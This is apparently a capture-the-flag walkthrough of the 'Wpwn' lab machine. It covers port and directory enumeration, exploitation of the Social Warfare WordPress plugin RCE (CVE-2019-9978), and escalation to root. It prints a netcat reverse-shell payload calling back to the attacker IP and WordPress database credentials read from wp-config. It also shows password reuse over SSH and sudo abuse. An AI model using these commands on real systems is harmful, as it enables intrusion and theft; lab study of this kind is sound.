Wpwn

Nmap

sudo nmap   192.168.178.123 -p- -sS -sV          

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Running curl on port 80 simply shows a basic greeting for the machine by the creator.

With nothing else interesting we move onto directory enumeration with dirsearch.py.

sudo python3 dirsearch.py -u http://192.168.178.123/ -w /usr/share/seclists/Discovery/Web-Content/common.txt --full-url -t 75

With the common.txt wordlists we hit robots.txt and /wordpress. Robots contains no interesting information.

Moving over to the /wordpress directory we get the following page.

/wordpress

Other than this the Wordpress site contains no interesting information. From here we can run WPScan in order to try and identify further information.

wpscan --url http://192.168.178.123/wordpress/ --passwords /usr/share/wordlists/rockyou.txt   

WPScan picks up the plugin 'social-warfare' as being installed and out of date.

Checking this against searchsploit reveals a RCE against the running version.

searchsploit -w social warfare 3.5.2

The vulnerability has been assigned CVE-2019-9978.

Description:

The social-warfare plugin before 3.5.3 for WordPress has stored XSS via the wp-admin/admin-post.php?swp_debug=load_options swp_url parameter, as exploited in the wild in March 2019. This affects Social Warfare and Social Warfare Pro.

The following GitHub shows a PoC for this exploit.

GitHub - hash3liZer/CVE-2019-9978: CVE-2019-9978 - (PoC) RCE in Social WarFare Plugin (<=3.5.2)GitHub

As per the GitHub description we need to create a text file that will be hosted on our attacking machine with the contents of what we want to execute.

<pre>system('command')</pre>

First I hosted a Python SimpleHTTPServer on my attacking machine.

sudo python2 -m SimpleHTTPServer 443

I then downloaded the associated Python script and executed as per below.

python2 cve-2019-9978.py  --target http://192.168.178.123/wordpress/ --payload-uri http://192.168.49.178:443/test.txt

In the example above the command included for test.txt was 'id'. From here I replaced the command with 'which nc' to see if netcat is on the target machine and then run the exploit again.

As netcat is installed we can replace the command in the test.txt file with that of a netcat reverse shell.

Contents of test.txt:

<pre>system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 192.168.49.178 80 >/tmp/f')</pre>

I then set a netcat listener on my attacking machine:

sudo nc -lvp 80

Running the exploit again hangs the script as we receive a reverse shell.

We then upgrade the shell:

/usr/bin/script -qc /bin/bash /dev/null

Moving back one directory in the shell we can then read the contents of wp-config for any MySQL database credentials.

We have gathered the credentials: wp_user:R3&]vzhHmMn9,:-5 From here I logged into MySQL and took the Wordpress administrator's hash. I was however, unable to crack. Looking on the box we have the user 'takis' I decided to see if password reuse was in play and SSH in as takis.

ssh takis@192.168.178.123

Now we are in as takis I then run sudo -l to check sudo permissions.

Looks like we can run all commands as any users without a password. A simple sudo /bin/bash will spawn us a root shell.